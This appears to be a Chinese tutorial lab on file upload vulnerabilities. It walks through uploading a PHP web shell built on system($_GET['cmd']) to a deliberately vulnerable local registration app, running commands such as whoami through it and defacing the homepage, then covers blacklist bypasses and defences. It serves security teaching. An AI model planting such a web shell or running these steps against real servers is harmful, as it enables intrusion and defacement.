文件上传漏洞常见利用方式分析

 原理

文件上传是Web应用中经常出现的功能,它允许用户上传文件到服务器并保存到特定位置。这对安全来说是一个很敏感的问题，一旦恶意程序被上传到服务器并获得执行权限，后果将不堪设想。因此绝大多数的Web应用都对文件上传功能有很多限制。
文件上传漏洞指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这种攻击方式直接、有效，在对付某些脆弱的系统时甚至没有门槛。

文件上传漏洞的常见利用方式有:
上传Web脚本程序，Web容器解释执行上传的恶意脚本。
上传Flash跨域策略文件crossdomain.xml，修改访问权限(其他策略文件利用方式类似)。
上传病毒、木马文件，诱骗用户和管理员下载执行。
上传包含脚本的图片，某些浏览器的低级版本会执行该脚本，用于钓鱼和欺诈。
总的来说,利用的上传文件要么具备可执行能力(恶意程序),要么具备影响服务器行为的能力(配置文件). 为了实现一次攻击利用,必须要满足以下条件:

文件能通过前端和后端的过滤和文件处理.
文件内容不会被改变,能够被正确的存储
存储位置是在Web容器控制范围
攻击者有权限访问存储目录

我们通过实验来演示利用方式一，包含以下材料：
regist文件夹（存在漏洞的eb应用）
hacker.php（待上传的恶意脚本）
hacked.html (黑页待替换的新主页)

使用以下命令下载实验材料到虚拟机任意目录下并解压.

wget http://labfile.oss.aliyuncs.com/courses/443/stuffs.tar.gztar -xzf stuffs.tar.gzcd stuffs
1.部署web应用

将regist文件夹拷贝到/var/www/html/目录下

sudo cp -R regist /var/www/html/

regist文件夹的目录结构如下
    index.html (前端注册页面)
    regist.php (后台注册处理程序)
    upload/ (文件上传目录)
    css/ (样式文件目录)
    fonts/ (字体文件目录)
    js/ (脚本文件目录)
   

修改目录权限:

sudo chmod 777 /var/www/html/regist -R
启动Apache2服务

sudo service apache2 start

2.上传恶意脚本程序

这是一个常见的新用户注册页面,我们随意填写注册信息.我们注意到,虽然这个页面对用户输入的文本信息有较为仔细的校验,但是并没有对上传头像的类型进行严格的检查,这是非常危险的行为.在上传头像处选择事先准备好的恶意PHP程序hacker.php.确认无误,点击注册.(用同样的方法上传hacked.html)

3.访问脚本程序

通过目录结构知道上传后的文件被存储在upload/目录下.上传的PHP文件可以通过在浏览器地址栏中输入http://localhost/regist/upload/hacker.php来访问

hacker.php源代码如下:

 

cmd:

result:

 

事实上,你可以在脚本文件中编写任意你喜欢的代码,只要构造得当并能够被顺利执行.

核心代码system($_GET['cmd']);调用php系统函数system来执行linux系统命令,命令从GET请求中的cmd参数获取.这意味着我们可以在当前用户权限下执行任意的linux命令,就像操作本地计算机一样.先测试一下恶意程序能否正常运行:

http://localhost/regist/upload/hacker.php?cmd=whoami

 
运行成功,这也意味着后端负责上传功能的程序模块没有对上传文件做有效的过滤和处理.接着,我们使用上传的hacke.html页面来替换网站首页:

http://localhost/regist/upload/hacker.php?cmd=mv hacked.html ../index.html

再次访问Web应用localhost/regist,刷新页面,发现替换成功,页面显示"You Are Hacked".

注意，这里需要将hacked.html上传至 /upload目录下

思考与扩展
1.类型检查
实验步骤中的网站前端部分没有对文件上传做有效的过滤与处理,同类的著名漏洞还有FCKEditor文件上传漏洞,FCKEditor是一款非常流行的富文本编辑器，某个PHP版本出过一个文件上传类型检查的漏洞,相关代码如下:

$Config['AllowdExtensions']['File'] = array();//允许上传的类型$Config['DenedExtensions']['File'] =array('php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'ascx', 'jsp', 'cfm', 'cfc', 'pl','pl','bat', 'exe', 'dll', 'reg', 'cgi' );//禁止上传的类型
可以看到,代码针对文件类型进行了检查，但使用了黑名单方式，所以如果我们使用php2、inc等类型名时就可以通过类型检查.另外,对于前端校验,在通常情况下可以通过修改或伪造POST包来绕过。

2.权限需求
为了达到攻击效果,实验步骤简化了一些复杂的细节.一些关键步骤都涉及到了操作权限.步骤对应所需的权限如下表:

步骤或操作        权限要求

脚本存储        Web容器对上传目录有写权限
脚本执行        用户组具有存储目录的访问权限和执行权限
替换首页        用户组对regist应用目录有写权限
作为一般的普通用户,通常只有读与执行权限,无法替换成功,必需通过利用其他漏洞获得更高的权限,因此有了实验步骤1中修改权限的一步.另外,在一般的Web应用中,文件上传的存储目录是未知的,但也可以通过收集服务器端信息和错误页面来确定.一般的框架和应用都有默认的上传存储目录,初级的开发者会直接使用这些目录使攻击者轻松确定访问URL,造成安全隐患.

 

3.安全防范
文件上传漏洞的利用方式多种多样,但是要想遏制住它也很容易.漏洞利用的条件通常都比较苛刻,只要堵住关键点,就能够解决问题.防范文件上传漏洞可以从阻止非法文件上传,阻止非法文件执行两处着手.

处理方式        处理手段
阻止非法文件上传        1.扩展名白名单,2.文件头判断
阻止非法文件执行        1.存储目录与Web应用分离,2.存储目录无执行权限,3.文件重命名,4.图片压
缩